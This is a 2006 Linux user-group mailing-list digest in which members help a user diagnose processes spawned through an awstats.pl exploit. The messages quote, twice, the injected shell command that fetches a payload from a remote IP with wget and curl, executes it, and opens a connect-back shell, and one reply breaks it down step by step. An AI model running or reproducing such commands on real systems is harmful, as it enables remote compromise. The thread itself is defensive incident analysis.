Roberto R. de los Santos Jr.
Systems Associate
Philippines / System departmentAGB Nielsen Media Research 1st Level RCC Center #104 Shaw Blvd Pasig City, 1603, Pasig City (Philippines) t: (+632)7473882 up to 87 f: (+632) 6357997 m: +639178738246 Please note: This email transmission including its attachments, are intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any views or opinions are solely those of the author and do not necessarily represent those of AGB Nielsen Media Research, unless specifically stated. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this email in error, please contact the sender and delete the email transmission immediately. -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Monday, May 08, 2006 12:00 PM To: [email protected] Subject: PLUG Digest, Vol 14, Issue 16 Send PLUG mailing list submissions to [email protected] To subscribe or unsubscribe via the World Wide Web, visit https://lists.hosting.qsr.com.ph/mailman/listinfo/plug or, via email, send a message with subject or body 'help' to [EMAIL PROTECTED] You can reach the person managing the list at [EMAIL PROTECTED] When replying, please edit your Subject line so it is more specific than "Re: Contents of PLUG digest..." Today's Topics: 1. Re: awstats.pl (Paul Patrick Carpio Prantilla) 2. Re: awstats.pl (Eduardo Tongson) 3. Re: awstats.pl (Norbert P. Copones) 4. Re: awstats.pl (Happy Kamote Foundation) 5. Re: awstats.pl (Paul Patrick C. Prantilla) ---------------------------------------------------------------------- Message: 1 Date: Mon, 08 May 2006 10:45:12 +0800 From: Paul Patrick Carpio Prantilla <[EMAIL PROTECTED]> Subject: Re: [plug] awstats.pl To: "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]> Message-ID: <[EMAIL PROTECTED]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Hello Kelsey, awstats has a good history of exploits against it, and it appears to be commonly exploited in redhat systems. Unless that's you downloading "ping.txt" or "ping" --which is apparently a perl exploit that most likely takes an IP addresss and port for it's two arguments-- those logs (or at least, set of commands) look like exploit attempts. -Paul Patrick C. Prantilla Kelsey Hartigan Go wrote: > Any vulnerability in awstats.pl? > > I suddenly have these processes running... > > 6086 ? S 0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl > 6087 ? R 81:06 sh -c echo ;echo b_exp;wget > http://219.84.105.36/ping > .txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget > http://219.84.10 > 5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping > http://219.84.105 > .36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 > http: > //219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 > 220.227.100.43303;done;wg > et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 > 3303;curl -o > pin > g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo > e_exp;% > 00/awstats.w.x.y.z.conf > > where w.x.y.z is my public ip... > > anybody know what this is that what's it's trying to do... > > > ------------------------------------------------------------------------ > > _________________________________________________ > Philippine Linux Users' Group (PLUG) Mailing List > [email protected] (#PLUG @ irc.free.net.ph) > Read the Guidelines: http://linux.org.ph/lists > Searchable Archives: http://archives.free.net.ph ------------------------------ Message: 2 Date: Mon, 8 May 2006 10:48:53 +0800 From: "Eduardo Tongson" <[EMAIL PROTECTED]> Subject: Re: [plug] awstats.pl To: "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]> Message-ID: <[EMAIL PROTECTED]> Content-Type: text/plain; charset=UTF-8; format=flowed <http://secunia.com/advisories/19969/> > anybody know what this is that what's it's trying to rudimentary connect back shell. ping would be a static netcat binary. - ed ------------------------------ Message: 3 Date: Mon, 8 May 2006 11:12:18 +0800 (PHT) From: "Norbert P. Copones" <[EMAIL PROTECTED]> Subject: Re: [plug] awstats.pl To: "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]> Message-ID: <CgpFB1VFEAY=:[EMAIL PROTECTED]> Content-Type: text/plain;charset=iso-8859-1 On Mon, May 8, 2006 10:45 am, Paul Patrick Carpio Prantilla wrote: > Hello Kelsey, > > awstats has a good history of exploits against it, and it appears to be > commonly exploited in redhat systems. Unless that's you downloading > "ping.txt" or "ping" --which is apparently a perl exploit that most > likely takes an IP addresss and port for it's two arguments-- those logs > (or at least, set of commands) look like exploit attempts. from what i understand, this doesn't look like a log only but actual processes running on his system. and yes there are many vulnerabilities in awstats. ------------------------------ Message: 4 Date: Mon, 8 May 2006 11:42:09 +0800 From: "Happy Kamote Foundation" <[EMAIL PROTECTED]> Subject: Re: [plug] awstats.pl To: [EMAIL PROTECTED], "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]> Message-ID: <[EMAIL PROTECTED]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Obviously if awstats is properly configured/patched then it will not run this process 6087 ? R 81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping .txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.10 5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105 .36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 http: //219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 3303;done;wg et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o pin g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo e_exp;% 00/awstats.w.x.y.z.conf and using a bit of common sense, you'll know that it had put in something on your box which is particularly malicious. Let's try to trim this down (since i have lots of time on my hands) - smells like a spawned sh shell. wget http://219.84.105.36/ping.txt mv ping.txt temp2006 perl temp2006 220.227.100.4 3303 : (smells like a backdoor) (oops this was unsuccessful, kiddie tries again using curl) cd /tmp/ curl -o temp2006 http://219.84.105.36/ping.txt perl temp2006 220.227.100.4 3303;done;wg (oops! this was unsuccessful too! 3 is a charm! this time comes precompiled *Grin*) wget http://219.84.105.36/ping chmod +x ping; ./ping 220.227.100.4 3303 and so on and so forth.. ;) ;) ------------------------------ Message: 5 Date: Mon, 08 May 2006 11:51:28 +0800 From: "Paul Patrick C. Prantilla" <[EMAIL PROTECTED]> Subject: Re: [plug] awstats.pl To: [EMAIL PROTECTED], "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]> Message-ID: <[EMAIL PROTECTED]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Hi Norbert, Yes, you're right. It wasn't apparent to me at first that those were just two lines. -Paul Patrick C. Prantilla > > from what i understand, this doesn't look like a log only but actual > processes running on his system. and yes there are many vulnerabilities in > awstats. > > _________________________________________________ > Philippine Linux Users' Group (PLUG) Mailing List > [email protected] (#PLUG @ irc.free.net.ph) > Read the Guidelines: http://linux.org.ph/lists > Searchable Archives: http://archives.free.net.ph ------------------------------ _________________________________________________ Philippine Linux Users' Group (PLUG) Mailing List [email protected] (#PLUG @ irc.free.net.ph) Read the Guidelines: http://linux.org.ph/lists Searchable Archives: http://archives.free.net.ph End of PLUG Digest, Vol 14, Issue 16 ************************************ _________________________________________________ Philippine Linux Users' Group (PLUG) Mailing List [email protected] (#PLUG @ irc.free.net.ph) Read the Guidelines: http://linux.org.ph/lists Searchable Archives: http://archives.free.net.ph
